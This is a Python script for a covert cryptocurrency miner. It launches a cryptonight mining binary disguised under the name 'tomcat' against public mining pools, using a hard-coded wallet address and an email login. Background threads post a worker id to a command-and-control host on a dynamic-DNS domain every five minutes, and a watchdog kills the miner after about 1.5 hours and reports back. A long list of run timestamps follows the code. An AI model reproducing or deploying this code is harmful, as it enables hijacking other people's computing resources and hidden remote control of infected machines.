import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:32:06.663903
#2018-02-17 17:20:07.401428
#2018-02-17 19:08:05.110812
#2018-02-17 20:58:01.541085
#2018-02-17 22:44:04.899290
#2018-02-18 00:28:05.434353
#2018-02-18 02:19:05.902119
#2018-02-18 04:06:04.033239
#2018-02-18 05:55:05.393241
#2018-02-18 07:46:08.671308
#2018-02-18 09:34:06.077956
#2018-02-18 11:20:07.099736
#2018-02-18 13:06:06.967633
#2018-02-18 14:55:06.243361
#2018-02-18 16:43:03.562474
#2018-02-18 18:32:01.441054
#2018-02-18 20:20:06.257905
#2018-02-18 22:06:05.499708
#2018-02-18 23:54:02.190238
#2018-02-19 01:40:04.213015
#2018-02-19 03:28:05.250014
#2018-02-19 05:13:06.310760
#2018-02-19 07:01:06.383691
#2018-02-19 08:51:06.867148
#2018-02-19 10:40:06.646442
#2018-02-19 12:27:01.745449
#2018-02-19 14:13:08.535981
#2018-02-19 16:04:07.304075
#2018-02-19 17:53:06.180004
#2018-02-19 19:40:01.421238
#2018-02-19 21:27:04.417750
#2018-02-19 23:13:04.624351
#2018-02-20 00:58:04.829087
#2018-02-20 02:48:05.253645
#2018-02-20 04:37:05.293839
#2018-02-20 06:21:05.130461
#2018-02-20 08:05:07.892939
#2018-02-20 09:51:05.690202
#2018-02-20 11:35:09.871369
#2018-02-20 13:23:04.830156
#2018-02-20 15:07:08.310699
#2018-02-20 16:53:08.636823
#2018-02-20 18:43:08.687215
#2018-02-20 20:34:05.137489
#2018-02-20 22:20:01.635908
#2018-02-21 00:01:06.221920
#2018-02-21 01:47:06.257853
#2018-02-21 03:34:04.280675
#2018-02-21 05:22:07.311263
#2018-02-21 07:09:05.713137
#2018-02-21 08:56:07.353060
#2018-02-21 10:46:10.391560
#2018-02-21 12:33:10.478751
#2018-02-21 14:19:05.798150
#2018-02-21 16:06:02.067011
#2018-02-21 17:57:04.558959
#2018-02-21 19:43:04.415241
#2018-02-21 21:31:05.415633
#2018-02-21 23:17:05.005566
#2018-02-22 01:08:05.845850
#2018-02-22 02:56:04.124862
#2018-02-22 04:43:01.351368
#2018-02-22 06:27:07.671857
#2018-02-22 08:14:08.731282
#2018-02-22 10:03:01.459374
#2018-02-22 11:46:04.343683
#2018-02-22 13:31:06.531508
#2018-02-22 15:20:06.869367
#2018-02-22 17:05:06.651830
#2018-02-22 18:52:05.169387
#2018-02-22 20:45:12.783946
#2018-02-22 22:32:06.248466
#2018-02-23 00:17:03.856422
#2018-02-23 02:06:07.136183
#2018-02-23 03:56:05.841435
#2018-02-23 05:33:01.235207
#2018-02-23 07:17:06.426911
#2018-02-23 09:20:08.394786
#2018-02-23 11:26:06.341179
#2018-02-23 13:17:03.843799
#2018-02-23 15:03:05.825145
#2018-02-23 16:52:04.160745
#2018-02-23 18:38:02.103691
#2018-02-23 20:24:05.271413
#2018-02-23 22:11:07.147672
#2018-02-23 23:58:04.192437
#2018-02-24 01:47:04.851800
#2018-02-24 03:38:05.206787
#2018-02-24 05:22:05.053755
#2018-02-24 07:10:03.916468
#2018-02-24 08:58:04.128344
#2018-02-24 10:39:01.575094
#2018-02-24 12:25:05.714585
#2018-02-24 14:19:04.333168
#2018-02-24 16:06:04.568803
#2018-02-24 17:57:06.024314
#2018-02-24 19:44:04.123348
#2018-02-24 21:30:09.937258
#2018-02-25 01:55:01.769001
#2018-02-25 05:08:03.733187
#2018-02-25 10:21:01.883939